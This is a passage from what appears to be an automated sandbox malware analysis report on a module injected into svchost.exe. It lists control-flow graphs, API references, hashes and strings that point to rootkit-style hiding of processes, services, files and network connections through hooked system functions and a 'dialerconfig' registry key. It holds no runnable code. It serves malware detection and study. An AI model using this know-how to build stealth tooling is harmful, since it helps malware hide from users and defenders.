                                                                • Part of subcall function 000002A661301628: RegCloseKey.ADVAPI32 ref: 000002A6613018A0
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
                                                              Similarity
                                                              • API ID: CloseOpen$HeapSleep$AllocProcess
                                                              • String ID:
                                                              • API String ID: 1534210851-0
                                                              • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                              • Instruction ID: 99b07525fd2711d8e82b8b49fba128a9359a21ce05ef994d83d7f8484eb62716
                                                              • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                              • Instruction Fuzzy Hash: F3314171B00A4593FF509B26DA4D3A963FCAB46FCAF0C54219E0BA7295FF1CC459C292

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 57 2a661303844-2a66130384f 58 2a661303869-2a661303870 57->58 59 2a661303851-2a661303864 StrCmpNIW 57->59 59->58 60 2a661303866 59->60 60->58
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: dialer
                                                              • API String ID: 0-3528709123
                                                              • Opcode ID: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                              • Instruction ID: 84d7da99e8808b0adfb76846f8b28e16625e6655772c6f218550ef611b4de524
                                                              • Opcode Fuzzy Hash: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                              • Instruction Fuzzy Hash: 59D0A760B512498BFF14DFE688CDA603798EB09F45F8C4034D90213150DF6C8A9D9711

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073099335.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a6612d0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID:
                                                              • API String ID: 1029625771-0
                                                              • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                              • Instruction ID: 1627250a6f1587746d6adcb486bc21ae0d1f8d3e6a0bb4f849c2ff22e67d6bd2
                                                              • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                              • Instruction Fuzzy Hash: DC61F0B2F016908BDB548F25D0487ADB3AEFB55FA4F688121DE5907788DF38D89AC701

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                               control_flow_graph 367 2a661302b2c-2a661302ba5 call 2a661322ce0 370 2a661302bab-2a661302bb1 367->370 371 2a661302ee0-2a661302f03 367->371 370->371 372 2a661302bb7-2a661302bba 370->372 372->371 373 2a661302bc0-2a661302bc3 372->373 373->371 374 2a661302bc9-2a661302bd9 GetModuleHandleA 373->374 375 2a661302bdb-2a661302beb call 2a661316090 374->375 376 2a661302bed 374->376 378 2a661302bf0-2a661302c0e 375->378 376->378 378->371 381 2a661302c14-2a661302c33 StrCmpNIW 378->381 381->371 382 2a661302c39-2a661302c3d 381->382 382->371 383 2a661302c43-2a661302c4d 382->383 383->371 384 2a661302c53-2a661302c5a 383->384 384->371 385 2a661302c60-2a661302c73 384->385 386 2a661302c83 385->386 387 2a661302c75-2a661302c81 385->387 388 2a661302c86-2a661302c8a 386->388 387->388 389 2a661302c9a 388->389 390 2a661302c8c-2a661302c98 388->390 391 2a661302c9d-2a661302ca7 389->391 390->391 392 2a661302d9d-2a661302da1 391->392 393 2a661302cad-2a661302cb0 391->393 394 2a661302da7-2a661302daa 392->394 395 2a661302ed2-2a661302eda 392->395 396 2a661302cc2-2a661302ccc 393->396 397 2a661302cb2-2a661302cbf call 2a66130199c 393->397 400 2a661302dbb-2a661302dc5 394->400 401 2a661302dac-2a661302db8 call 2a66130199c 394->401 395->371 395->385 398 2a661302cce-2a661302cdb 396->398 399 2a661302d00-2a661302d0a 396->399 397->396 398->399 403 2a661302cdd-2a661302cea 398->403 404 2a661302d3a-2a661302d3d 399->404 405 2a661302d0c-2a661302d19 399->405 407 2a661302dc7-2a661302dd4 400->407 408 2a661302df5-2a661302df8 400->408 401->400 412 2a661302ced-2a661302cf3 403->412 414 2a661302d4b-2a661302d58 lstrlenW 404->414 415 2a661302d3f-2a661302d49 call 2a661301bbc 404->415 405->404 413 2a661302d1b-2a661302d28 405->413 407->408 417 2a661302dd6-2a661302de3 407->417 410 2a661302dfa-2a661302e03 call 2a661301bbc 408->410 411 2a661302e05-2a661302e12 lstrlenW 408->411 410->411 429 2a661302e4a-2a661302e55 410->429 421 2a661302e14-2a661302e1e 411->421 422 2a661302e35-2a661302e3f call 2a661303844 411->422 419 2a661302cf9-2a661302cfe 412->419 420 2a661302d93-2a661302d98 412->420 423 2a661302d2b-2a661302d31 413->423 425 2a661302d5a-2a661302d64 414->425 426 2a661302d7b-2a661302d8d call 2a661303844 414->426 415->414 415->420 427 2a661302de6-2a661302dec 417->427 419->399 419->412 433 2a661302e42-2a661302e44 420->433 421->422 434 2a661302e20-2a661302e33 call 2a66130152c 421->434 422->433 423->420 435 2a661302d33-2a661302d38 423->435 425->426 428 2a661302d66-2a661302d79 call 2a66130152c 425->428 426->420 426->433 427->429 430 2a661302dee-2a661302df3 427->430 428->420 428->426 442 2a661302e57-2a661302e5b 429->442 443 2a661302ecc-2a661302ed0 429->443 430->408 430->427 433->395 433->429 434->422 434->429 435->404 435->423 444 2a661302e5d-2a661302e61 442->444 445 2a661302e63-2a661302e7d call 2a6613085c0 442->445 443->395 444->445 448 2a661302e80-2a661302e83 444->448 445->448 451 2a661302ea6-2a661302ea9 448->451 452 2a661302e85-2a661302ea3 call 2a6613085c0 448->452 451->443 454 2a661302eab-2a661302ec9 call 2a6613085c0 451->454 452->451 454->443
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
                                                              Similarity
                                                              • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                              • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                              • API String ID: 2119608203-3850299575
                                                              • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                              • Instruction ID: 517c12f0b0e1090de60bb0fcc7bf1fefb46beb5eab338aff40a4245cd4b9731a
                                                              • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                              • Instruction Fuzzy Hash: 52B17C72B10A9087EB649F35D64C7A963E9F746F86F485016EE0A63B94DF39CC48C381
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                              • String ID:
                                                              • API String ID: 3140674995-0
                                                              • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                              • Instruction ID: cc74eacb843f1603229d41cad126e5c04d88afadf7cf4452611ec155d591a17a
                                                              • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                              • Instruction Fuzzy Hash: E5315072705B808AEB609F60E8483ED73A8F785B44F484429DA8E67B94EF7CC54DC710
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                              • String ID:
                                                              • API String ID: 1239891234-0
                                                              • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                              • Instruction ID: 36f9f4375d1256616007857bae393de0df9f8980b3b202d925a5ac7eb32d36a2
                                                              • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                              • Instruction Fuzzy Hash: 4A316F32714F8086DB60CF25E84839E73A8F78AB55F580125EA9E53B68DF7CC159CB41

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                              • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                              • API String ID: 106492572-2879589442
                                                              • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                              • Instruction ID: c27f832fced2d29170b0e4fb301a485cb6098ecabde165e8eb95b814a7a813c5
                                                              • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                              • Instruction Fuzzy Hash: BA71F476B10E5087EB10DF65E89D69933B8FB8AF8DF081121DA4F67A68DF28C548C341

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                              • String ID: d
                                                              • API String ID: 2005889112-2564639436
                                                              • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                              • Instruction ID: 5c01c19bc0298f85c8339ea94e196dd5b5f1323890ee4be88120aa0ba9bb59bc
                                                              • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                              • Instruction Fuzzy Hash: F0512776A14B8487EB50CFA2E44D35AB7B9F78AF89F094124DA4A27728DF7CC049C741

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
                                                              Similarity
                                                              • API ID: CurrentThread$AddressHandleModuleProc
                                                              • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                              • API String ID: 4175298099-1975688563
                                                              • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                              • Instruction ID: 147c2e2ec541b53145e726b289546c28288565d736413d3e5244b9f1f05d4738
                                                              • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                              • Instruction Fuzzy Hash: 8A31A064B10A5AA3EA04EBA5ED5E6D423A9B717F49F8C4113940B331659F3CC24DC3D2

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                               control_flow_graph 209 2a6612d6910-2a6612d6916 210 2a6612d6951-2a6612d695b 209->210 211 2a6612d6918-2a6612d691b 209->211 212 2a6612d6a78-2a6612d6a8d 210->212 213 2a6612d6945-2a6612d6984 call 2a6612d6fc0 211->213 214 2a6612d691d-2a6612d6920 211->214 217 2a6612d6a8f 212->217 218 2a6612d6a9c-2a6612d6ab6 call 2a6612d6e54 212->218 232 2a6612d6a52 213->232 233 2a6612d698a-2a6612d699f call 2a6612d6e54 213->233 215 2a6612d6922-2a6612d6925 214->215 216 2a6612d6938 __scrt_dllmain_crt_thread_attach 214->216 220 2a6612d6931-2a6612d6936 call 2a6612d6f04 215->220 221 2a6612d6927-2a6612d6930 215->221 224 2a6612d693d-2a6612d6944 216->224 222 2a6612d6a91-2a6612d6a9b 217->222 230 2a6612d6aef-2a6612d6b20 call 2a6612d7190 218->230 231 2a6612d6ab8-2a6612d6aed call 2a6612d6f7c call 2a6612d6e1c call 2a6612d7318 call 2a6612d7130 call 2a6612d7154 call 2a6612d6fac 218->231 220->224 241 2a6612d6b22-2a6612d6b28 230->241 242 2a6612d6b31-2a6612d6b37 230->242 231->222 236 2a6612d6a54-2a6612d6a69 232->236 244 2a6612d69a5-2a6612d69b6 call 2a6612d6ec4 233->244 245 2a6612d6a6a-2a6612d6a77 call 2a6612d7190 233->245 241->242 247 2a6612d6b2a-2a6612d6b2c 241->247 248 2a6612d6b7e-2a6612d6b94 call 2a6612d268c 242->248 249 2a6612d6b39-2a6612d6b43 242->249 259 2a6612d6a07-2a6612d6a11 call 2a6612d7130 244->259 260 2a6612d69b8-2a6612d69dc call 2a6612d72dc call 2a6612d6e0c call 2a6612d6e38 call 2a6612dac0c 244->260 245->212 254 2a6612d6c1f-2a6612d6c2c 247->254 267 2a6612d6bcc-2a6612d6bce 248->267 268 2a6612d6b96-2a6612d6b98 248->268 255 2a6612d6b45-2a6612d6b4d 249->255 256 2a6612d6b4f-2a6612d6b5d call 2a6612e5780 249->256 262 2a6612d6b63-2a6612d6b78 call 2a6612d6910 255->262 256->262 278 2a6612d6c15-2a6612d6c1d 256->278 259->232 280 2a6612d6a13-2a6612d6a1f call 2a6612d7180 259->280 260->259 312 2a6612d69de-2a6612d69e5 __scrt_dllmain_after_initialize_c 260->312 262->248 262->278 276 2a6612d6bd5-2a6612d6bea call 2a6612d6910 267->276 277 2a6612d6bd0-2a6612d6bd3 267->277 268->267 275 2a6612d6b9a-2a6612d6bbc call 2a6612d268c call 2a6612d6a78 268->275 275->267 306 2a6612d6bbe-2a6612d6bc6 call 2a6612e5780 275->306 276->278 291 2a6612d6bec-2a6612d6bf6 276->291 277->276 277->278 278->254 299 2a6612d6a45-2a6612d6a50 280->299 300 2a6612d6a21-2a6612d6a2b call 2a6612d7098 280->300 296 2a6612d6c01-2a6612d6c11 call 2a6612e5780 291->296 297 2a6612d6bf8-2a6612d6bff 291->297 296->278 297->278 299->236 300->299 311 2a6612d6a2d-2a6612d6a3b 300->311 306->267 311->299 312->259 313 2a6612d69e7-2a6612d6a04 call 2a6612dabc8 312->313 313->259
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073099335.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a6612d0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                              • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                              • API String ID: 190073905-1786718095
                                                              • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                              • Instruction ID: e87bf346922b52b2af9168f1f418e053012b6a09ee5fcf7955fafdcfd6fac762
                                                              • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                              • Instruction Fuzzy Hash: 0D81CE21F106818BFA54AB66D48D399329DAF87F80F5C8125DA4987796EF3CC9CD8703

                                                              Control-flow Graph

                                                              APIs
                                                              • GetLastError.KERNEL32 ref: 000002A66130CE37
                                                              • FlsGetValue.KERNEL32(?,?,?,000002A661310A6B,?,?,?,000002A66131045C,?,?,?,000002A66130C84F), ref: 000002A66130CE4C
                                                              • FlsSetValue.KERNEL32(?,?,?,000002A661310A6B,?,?,?,000002A66131045C,?,?,?,000002A66130C84F), ref: 000002A66130CE6D
                                                              • FlsSetValue.KERNEL32(?,?,?,000002A661310A6B,?,?,?,000002A66131045C,?,?,?,000002A66130C84F), ref: 000002A66130CE9A
                                                              • FlsSetValue.KERNEL32(?,?,?,000002A661310A6B,?,?,?,000002A66131045C,?,?,?,000002A66130C84F), ref: 000002A66130CEAB
                                                              • FlsSetValue.KERNEL32(?,?,?,000002A661310A6B,?,?,?,000002A66131045C,?,?,?,000002A66130C84F), ref: 000002A66130CEBC
                                                              • SetLastError.KERNEL32 ref: 000002A66130CED7
                                                              • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000002A661310A6B,?,?,?,000002A66131045C,?,?,?,000002A66130C84F), ref: 000002A66130CF0D
                                                              • FlsSetValue.KERNEL32(?,?,00000001,000002A66130ECCC,?,?,?,?,000002A66130BF9F,?,?,?,?,?,000002A661307AB0), ref: 000002A66130CF2C
                                                                • Part of subcall function 000002A66130D6CC: HeapAlloc.KERNEL32 ref: 000002A66130D721
                                                              • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002A661310A6B,?,?,?,000002A66131045C,?,?,?,000002A66130C84F), ref: 000002A66130CF54
                                                                • Part of subcall function 000002A66130D744: HeapFree.KERNEL32 ref: 000002A66130D75A
                                                                • Part of subcall function 000002A66130D744: GetLastError.KERNEL32 ref: 000002A66130D764
                                                              • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002A661310A6B,?,?,?,000002A66131045C,?,?,?,000002A66130C84F), ref: 000002A66130CF65
                                                              • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002A661310A6B,?,?,?,000002A66131045C,?,?,?,000002A66130C84F), ref: 000002A66130CF76
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Value$ErrorLast$Heap$AllocFree
                                                              • String ID:
                                                              • API String ID: 570795689-0
                                                              • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                              • Instruction ID: a3ebcece3df98fd1e9725f906f8bf8db5f5c64855dc8a79f9fd7b15e885684d0
                                                              • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                              • Instruction Fuzzy Hash: 77417420F0128443FA68A735595D36922DD5B47FB2F1C4764A93B376E6DF2C980D8393

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                              • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                              • API String ID: 2171963597-1373409510
                                                              • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                              • Instruction ID: 9e913e5ef9d9d4dd90f3ca067dd4efb44e8ac8cefc28dc1332a14b226ca3e093
                                                              • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                              • Instruction Fuzzy Hash: 6C213A72B18A9083EB10CB65E54D35A73A4F78ABA5F580215EA5A13AA8CF7CC149CB41

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                               control_flow_graph 588 2a66130a544-2a66130a5ac call 2a66130b414 591 2a66130a5b2-2a66130a5b5 588->591 592 2a66130aa13-2a66130aa1b call 2a66130c748 588->592 591->592 593 2a66130a5bb-2a66130a5c1 591->593 595 2a66130a5c7-2a66130a5cb 593->595 596 2a66130a690-2a66130a6a2 593->596 595->596 600 2a66130a5d1-2a66130a5dc 595->600 598 2a66130a6a8-2a66130a6ac 596->598 599 2a66130a963-2a66130a967 596->599 598->599 603 2a66130a6b2-2a66130a6bd 598->603 601 2a66130a969-2a66130a970 599->601 602 2a66130a9a0-2a66130a9aa call 2a661309634 599->602 600->596 604 2a66130a5e2-2a66130a5e7 600->604 601->592 605 2a66130a976-2a66130a99b call 2a66130aa1c 601->605 602->592 616 2a66130a9ac-2a66130a9cb call 2a661307940 602->616 603->599 607 2a66130a6c3-2a66130a6ca 603->607 604->596 608 2a66130a5ed-2a66130a5f7 call 2a661309634 604->608 605->602 612 2a66130a6d0-2a66130a707 call 2a661309a10 607->612 613 2a66130a894-2a66130a8a0 607->613 608->616 619 2a66130a5fd-2a66130a628 call 2a661309634 * 2 call 2a661309d24 608->619 612->613 624 2a66130a70d-2a66130a715 612->624 613->602 617 2a66130a8a6-2a66130a8aa 613->617 621 2a66130a8ba-2a66130a8c2 617->621 622 2a66130a8ac-2a66130a8b8 call 2a661309ce4 617->622 656 2a66130a648-2a66130a652 call 2a661309634 619->656 657 2a66130a62a-2a66130a62e 619->657 621->602 623 2a66130a8c8-2a66130a8d5 call 2a6613098b4 621->623 622->621 632 2a66130a8db-2a66130a8e3 622->632 623->602 623->632 629 2a66130a719-2a66130a74b 624->629 634 2a66130a887-2a66130a88e 629->634 635 2a66130a751-2a66130a75c 629->635 637 2a66130a9f6-2a66130aa12 call 2a661309634 * 2 call 2a66130c6a8 632->637 638 2a66130a8e9-2a66130a8ed 632->638 634->613 634->629 635->634 639 2a66130a762-2a66130a77b 635->639 637->592 641 2a66130a8ef-2a66130a8fe call 2a661309ce4 638->641 642 2a66130a900 638->642 643 2a66130a781-2a66130a7c6 call 2a661309cf8 * 2 639->643 644 2a66130a874-2a66130a879 639->644 652 2a66130a903-2a66130a90d call 2a66130b4ac 641->652 642->652 669 2a66130a7c8-2a66130a7ee call 2a661309cf8 call 2a66130ac38 643->669 670 2a66130a804-2a66130a80a 643->670 649 2a66130a884 644->649 649->634 652->602 667 2a66130a913-2a66130a961 call 2a661309944 call 2a661309b50 652->667 656->596 673 2a66130a654-2a66130a674 call 2a661309634 * 2 call 2a66130b4ac 656->673 657->656 661 2a66130a630-2a66130a63b 657->661 661->656 666 2a66130a63d-2a66130a642 661->666 666->592 666->656 667->602 688 2a66130a7f0-2a66130a802 669->688 689 2a66130a815-2a66130a872 call 2a66130a470 669->689 675 2a66130a87b 670->675 676 2a66130a80c-2a66130a810 670->676 694 2a66130a676-2a66130a680 call 2a66130b59c 673->694 695 2a66130a68b 673->695 681 2a66130a880 675->681 676->643 681->649 688->669 688->670 689->681 698 2a66130a686-2a66130a9ef call 2a6613092ac call 2a66130aff4 call 2a6613094a0 694->698 699 2a66130a9f0-2a66130a9f5 call 2a66130c6a8 694->699 695->596 698->699 699->637

Memory Dump Source
• Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
Similarity
• API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
• String ID: csm$csm$csm
• API String ID: 849930591-393685449
• Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
• Instruction ID: f9dc5a9824cbe41745e6e6afb53450f4abea2dc5f6e99ba2920a5b912b4b268f
• Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
• Instruction Fuzzy Hash: AEE19F72B047448BEB20DF25A44C39D7BE8F746B99F084115DE8A67BA5CF38C189C782

Memory Dump Source
• Source File: 00000027.00000002.3073099335.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_39_2_2a6612d0000_svchost.jbxd
Similarity
• API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
• String ID: csm$csm$csm
• API String ID: 849930591-393685449
• Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
• Instruction ID: 681959dd6542599d6789764f186a42efd8a6d505218f830932f82b8ebb8010d4
• Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
• Instruction Fuzzy Hash: C1E17C32F04B808BEB609B65D45839D77ACFB56B98F181115EE8957B99CF38C0E9C702

Memory Dump Source
• Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
Similarity
• API ID: AddressFreeLibraryProc
• String ID: api-ms-$ext-ms-
• API String ID: 3013587201-537541572
• Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
• Instruction ID: fa6adfc857896f79626ba7455a121a59232fbacac11bf9aa969e94737a29d1b3
• Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
• Instruction Fuzzy Hash: 2241E122B15A0083EA16DB56A80C75533DDBB46FE1F0E41259D0BB7784EF3CC44D838A

Memory Dump Source
• Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
Similarity
• API ID: Heap$Process$AllocEnumFreeInfoQueryValue
• String ID: d
• API String ID: 3743429067-2564639436
• Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
• Instruction ID: 29549edc3a05bb9f30fb41ffd792d5d1f480f0e7d2fd4d10c68227b69ff2f9b1
• Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
• Instruction Fuzzy Hash: 2B418B72614B80C7E764CF61E44839A77B5F389F89F488129DA8A17B58DF3CC489CB41

APIs
• FlsGetValue.KERNEL32(?,?,?,000002A66130C7DE,?,?,?,?,?,?,?,?,000002A66130CF9D,?,?,00000001), ref: 000002A66130D087
• FlsSetValue.KERNEL32(?,?,?,000002A66130C7DE,?,?,?,?,?,?,?,?,000002A66130CF9D,?,?,00000001), ref: 000002A66130D0A6
• FlsSetValue.KERNEL32(?,?,?,000002A66130C7DE,?,?,?,?,?,?,?,?,000002A66130CF9D,?,?,00000001), ref: 000002A66130D0CE
• FlsSetValue.KERNEL32(?,?,?,000002A66130C7DE,?,?,?,?,?,?,?,?,000002A66130CF9D,?,?,00000001), ref: 000002A66130D0DF
• FlsSetValue.KERNEL32(?,?,?,000002A66130C7DE,?,?,?,?,?,?,?,?,000002A66130CF9D,?,?,00000001), ref: 000002A66130D0F0
Memory Dump Source
• Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
Similarity
• API ID: Value
• String ID: 1%$Y%
• API String ID: 3702945584-1395475152
• Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
• Instruction ID: bc4377a1b8938ee1d589c6b188f15fe87120af383a10576ee3c01281e8991c6e
• Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
• Instruction Fuzzy Hash: F2118620F0428443FA68A735595D36962DD5B46FF1F1C4324993B277DADF2CC40A8686

Memory Dump Source
• Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
Similarity
• API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
• String ID:
• API String ID: 190073905-0
• Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
